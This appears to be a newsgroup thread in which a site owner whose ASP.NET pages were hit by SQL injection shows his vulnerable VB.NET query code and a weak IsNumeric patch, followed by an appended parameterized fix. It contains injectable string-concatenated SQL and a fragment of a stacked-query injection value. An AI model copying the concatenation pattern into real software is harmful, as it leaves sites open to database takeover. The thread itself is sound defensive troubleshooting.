By the way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    If Not Page.IsPostBack Then
        If Request.QueryString("ClassmateID") <> "" Then
            dsClassmates.SelectCommand = "SELECT * FROM [Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " & _
                Request.QueryString("ClassmateID")
            dsClassmates.DataBind()
        End If
    End If
End Sub
Here's what I changed it to (the line that tests for IsNumeric is new):
Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
    If Not Page.IsPostBack Then
        If Request.QueryString("ClassmateID") <> "" Then
            If IsNumeric(Request.QueryString("ClassmateID")) And _
               (Len(Request.QueryString("ClassmateID").ToString) < 6) Then
                dsClassmates.SelectCommand = "SELECT * FROM [Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " & _
                    Request.QueryString("ClassmateID")
                dsClassmates.DataBind()
            End If
        End If
    End If
End Sub
I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:
So it seems to me if I test for numeric and limit the length of the query
string I should be covered.
Any comments?
(still wondering about the MS injection analyzer too)
Thanks,
Keith
"Keith G Hicks" <kr*@comcast.net> wrote in message
news:#k**************@TK2MSFTNGP02.phx.gbl...
I have a site that is made up of several aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.
Here's an example from the readme.html file for the tool:
msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"
Here's one of the warnings I get:
** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx
(line 2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.
And there's nothing in my output file. It looks like this:
<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->
What do I do to run this on my aspx pages?
Can anyone help me out here? If I'm in the wrong newsgroup for this, please
tell me where I should post instead.
Thanks,
Keith
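The reply above filters the query string with IsNumeric and a length check before concatenating it into the SELECT. That blocks the posted payload, but IsNumeric also accepts forms such as "1E3" or "&H10", and the value is still spliced into SQL text. The snippet below is an added example (not code from the original post) of the same Page_Load written so the value reaches SQL Server as a typed parameter instead; it assumes dsClassmates is a SqlDataSource declared in the page markup and that ClassmateID is an integer column.

```vbnet
' Added example: parameterized SqlDataSource query for the ClassmateID page.
' Assumptions (not from the original post): dsClassmates is a SqlDataSource
' in the markup, and ClassmateID is an integer column in the view.
Imports System.Data
Imports System.Web.UI.WebControls

Partial Class ClassmatePage
    Inherits System.Web.UI.Page

    Protected Sub Page_Load(ByVal sender As Object, ByVal e As System.EventArgs) Handles Me.Load
        If Page.IsPostBack Then Return

        ' Integer.TryParse accepts only a plain integer (optional sign and digits);
        ' "616;DECLARE @S ..." and "1E3" are both rejected here.
        Dim classmateId As Integer
        If Not Integer.TryParse(Request.QueryString("ClassmateID"), classmateId) Then
            Return
        End If

        ' The statement text is fixed; the value travels separately as @ClassmateID,
        ' so nothing from the query string can ever become part of the SQL.
        dsClassmates.SelectCommand = _
            "SELECT * FROM [Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = @ClassmateID"
        dsClassmates.SelectParameters.Clear()
        dsClassmates.SelectParameters.Add( _
            New Parameter("ClassmateID", DbType.Int32, classmateId.ToString()))
        dsClassmates.DataBind()
    End Sub
End Class
```

The same parameter can be declared in the markup with a QueryStringParameter under SelectParameters; the point is that the ID is bound as DbType.Int32, never concatenated.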